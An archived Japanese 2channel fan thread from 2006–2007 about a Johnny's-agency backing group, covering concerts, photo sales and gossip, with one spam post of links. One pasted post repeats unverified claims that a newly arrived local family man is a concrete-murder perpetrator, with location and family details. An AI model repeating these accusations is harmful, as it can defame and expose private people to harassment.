今までにないくらい扱いの良さに感謝ですよ!
またあるといいね!

192 :ユーは名無しネ:2006/09/21(木) 16:31:27
>190
親分叩いてないのにアーチストに見えるの?

193 :ユーは名無しネ:2006/09/21(木) 18:55:19
('A`)

194 :ユーは名無しネ:2006/09/23(土) 03:26:17
すの日記に話題が少し出てた


195 :ユーは名無しネ:2006/09/28(木) 14:14:29
りっくんダイスチ

196 :ユーは名無しネ:2006/10/03(火) 00:11:25
ね、5のメソバーって草加じゃないよね?

197 :ユーは名無しネ:2006/10/14(土) 03:34:48
シラネ

198 :ユーは名無しネ:2006/10/26(木) 00:37:54
ヤフオクに写真売ってるお

199 :ユーは名無しネ:2006/11/01(水) 08:55:20
リンス以外の写真撤収と聞いたんだが

200 :ユーは名無しネ:2006/11/03(金) 00:33:49
撤収じゃなくて売り切ったからだろーが
不用意に不安を煽るようなこと書くんじゃねーぞコラ

201 :ユーは名無しネ:2006/11/07(火) 20:15:07
825:ユーは名無しネ :2006/11/07(火) 20:12:14 [sage]
一応ソース
http://p.pita.st/?m=yqsgmvst

202 :ユーは名無しネ:2006/11/08(水) 22:15:21
4人全員辞めてます

203 :ユーは名無しネ:2006/11/09(木) 21:25:11
百識

204 :ユーは名無しネ:2006/11/11(土) 03:26:39


205 :ユーは名無しネ:2006/11/12(日) 09:17:58
あらち正月紺は出ないのかな

206 :ユーは名無しネ:2006/11/12(日) 10:44:49
出ないとオモー

207 :ユーは名無しネ:2006/11/12(日) 11:21:15
>206
ヤパーリ出ないかorz

208 :ユーは名無しネ:2006/11/17(金) 16:48:03
プ

209 :ユーは名無しネ:2006/12/08(金) 13:56:38
滝つ紺wktk

210 :ユーは名無しネ:2006/12/12(火) 21:37:53
自分が情報遅いだけかもしれんがプレミアムに出るらしいwktk

211 :ユーは名無しネ:2007/01/23(火) 22:30:53
滝つツアーつくかな?
石垣は舞台リハと被るみたいだけど。

212 :すずめ:2007/02/02(金) 18:51:37
おっさんグループ

213 :すずめ:2007/02/06(火) 23:19:59
はやく
解散しろ

214 :ユーは名無しネ:2007/02/07(水) 09:11:34
ユーチューブみたいに動画も投稿できる掲示板で芸能人の秘蔵映像発見!!
↓ ↓みんなのお宝映像も投稿できるよ
http://www.debutroad.com/xp/
 ジャニネタ掲示板!!の掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=4
 スマスマ板の掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=5
 V6専用掲示板の掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=15
 NewS専用BBSの掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=19
 KAT-TUN掲示板の掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=16
 関ジャニ専用掲示板の掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=18
結構面白かったんで皆さんもどうぞ。


215 :すずめ:2007/02/11(日) 04:41:27
いらないユニット

216 :ユーは名無しネ:2007/02/11(日) 22:14:37
客と握手しまくるチャーシューカワユス

217 :ユーは名無しネ:2007/02/12(月) 14:19:09
>216

それって何々?

218 :ユーは名無しネ:2007/02/12(月) 20:13:18
リンスはいつまで滝つにつくのかな

219 :ユーは名無しネ:2007/02/12(月) 21:13:03
ユニかけもなんてリンスも大変だな

220 :ユーは名無しネ:2007/02/16(金) 13:29:21
1 :おさかなくわえた名無しさん :2007/02/15(木) 22:37:20 ID:gIZCPGDM
962 名前:おさかなくわえた名無しさん[sage] 投稿日:2007/01/12(金) 06:52:38 ID:0wf1ypQR
最近近くに越してきた一家の夫が、どうやらコンクリ殺人の犯人らしい。
すでに町内はパニック状態で、
署名を集めて出て行かせようとしたり、その一家には何も売らなかったりとかなりの差別っぷり。
私はひょんな事からコンクリの奥さんと話すようになったんだけど、
引っ越しても引っ越してもストーカーのように追いかけ続ける人が何人もいて、移り住んだ地域の人達にソース付きでバラしてしまうらしい。
そしてそれは妻が子供を連れて別居しても続いてしまうので、離婚もできないらしい。

23 :おさかなくわえた名無しさん:2007/01/13(土) 11:33:58 ID:1ooRv/+3
前スレ962だけど、
全部本当だよ。日本も捨てたものじゃないね。
昨日、家にコンクリの奥さんから電話かかってきて、
「私たちの事、掲示板に書いたでしょう!」って言われた。
生活板住人だったみたい。
「どうなるかわかってるでしょうね!」って言われちゃったから、もうすぐコンクリにされちゃうかも。

63 :おさかなくわえた名無しさん:2007/01/13(土) 18:35:59 ID:1ooRv/+3
>>57
石川県。田舎を転々としてるみたい
リストの名字と一致しないから、たぶん婿養子なんだろう。
中学生の娘がいるからたぶん最後の人。仕事はしてないっぽい。
あと>>53、引っ越してきて直ぐの時にストーカーにそれやられてた。
ついでに市のサイトのBBSにも書かれてたよ。

5 :おさかなくわえた名無しさん :2007/02/15(木) 22:39:15 ID:gIZCPGDM
この事件を知らない方はここにあります。多分冗談だろ?と思いますが事実です。
これがあの震撼させた事件です
http://tokyo.cool.ne.jp/maromi/pic/jyoshikouseiconcretehannninnpic.htm
http://www5e.biglobe.ne.jp/~rolling/concrete.htm
http://2ch-library.com/news/concrete/

さらに恐ろしい事に主犯・宮野は2月2日に出所済。

221 :ユーは名無しネ:2007/02/18(日) 15:04:38
百万石ダブル餡子にて
空スクでタオル振り回して海老氏と一緒に出て来た5
踊りなれてないからゼエハアしてた5
みんなガバエエかたよ

222 :ユーは名無しネ:2007/02/19(月) 23:59:48
いいな。痴呆のほうが楽しそうだよね。
扱いも良さそうだし。

223 :ユーは名無しネ:2007/02/22(木) 01:01:04
横アリ追加ってFIVEつくよね?

福島とかチケ探そうかなー。

33 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)